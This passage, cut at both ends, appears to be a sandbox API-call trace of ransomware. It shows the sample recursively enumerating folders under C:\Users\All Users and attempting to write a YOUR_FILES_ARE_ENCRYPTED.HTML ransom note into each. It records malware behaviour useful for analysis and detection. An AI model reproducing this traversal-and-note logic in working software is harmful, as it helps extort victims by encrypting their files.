ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8c51e1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8ca0b6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.442] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.442] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0110.442] GetProcessHeap () returned 0x600000 [0110.442] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.443] GetProcessHeap () returned 0x600000 [0110.443] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.443] GetProcessHeap () returned 0x600000 [0110.443] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.444] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="XboxLive", cAlternateFileName="")) returned 1 [0110.444] StrStrIW (lpFirst="XboxLive", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.444] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive") returned 41 [0110.444] GetProcessHeap () returned 0x600000 [0110.444] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.445] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive" [0110.445] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\*" [0110.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf8e6242, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.445] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf8e6242, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 1 [0110.445] StrStrIW (lpFirst="NSALCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.445] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache") returned 51 [0110.445] GetProcessHeap () returned 0x600000 [0110.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.446] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache" [0110.446] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*" [0110.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf8d9cfd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.446] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf8d9cfd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.446] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8d9cfd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8d9cfd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8ddabe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.446] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8d9cfd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8d9cfd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8ddabe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.446] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.446] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0110.446] GetProcessHeap () returned 0x600000 [0110.446] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\NSALCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\nsalcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.446] GetProcessHeap () returned 0x600000 [0110.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.447] GetProcessHeap () returned 0x600000 [0110.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.447] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8e6242, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8e6242, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8eb16d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.447] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8e6242, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8e6242, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8eb16d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.447] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.447] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0110.447] GetProcessHeap () returned 0x600000 [0110.447] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\XboxLive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.448] GetProcessHeap () returned 0x600000 [0110.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.448] GetProcessHeap () returned 0x600000 [0110.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8f12e2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8f12e2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8f9a15, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8f12e2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8f12e2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8f9a15, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.449] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0110.449] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0110.449] GetProcessHeap () returned 0x600000 [0110.449] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.450] GetProcessHeap () returned 0x600000 [0110.450] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.450] GetProcessHeap () returned 0x600000 [0110.450] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0110.450] StrStrIW (lpFirst="Microsoft OneDrive", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.450] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive") returned 41 [0110.450] GetProcessHeap () returned 0x600000 [0110.450] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.451] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive" [0110.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*" [0110.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xaf913282, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.451] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xaf913282, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0110.451] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="setup", cAlternateFileName="")) returned 1 [0110.451] StrStrIW (lpFirst="setup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.451] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned 47 [0110.451] GetProcessHeap () returned 0x600000 [0110.451] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.452] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup" [0110.452] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*" [0110.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xaf909646, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.453] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xaf909646, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.453] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf909646, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf909646, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf90d35c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x630688, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.453] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf909646, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf909646, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf90d35c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x630688, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.453] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.453] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0110.453] GetProcessHeap () returned 0x600000 [0110.453] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.453] GetProcessHeap () returned 0x600000 [0110.453] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.453] GetProcessHeap () returned 0x600000 [0110.453] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.454] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf913282, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf913282, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9180d1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.454] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf913282, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf913282, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9180d1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.454] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.454] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0110.454] GetProcessHeap () returned 0x600000 [0110.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.455] GetProcessHeap () returned 0x600000 [0110.455] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.455] GetProcessHeap () returned 0x600000 [0110.455] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.455] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0110.455] StrStrIW (lpFirst="Package Cache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.455] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache") returned 36 [0110.455] GetProcessHeap () returned 0x600000 [0110.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.456] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache") returned="\\\\?\\C:\\Users\\All Users\\Package Cache" [0110.456] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*" [0110.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb06d36f3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.457] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, 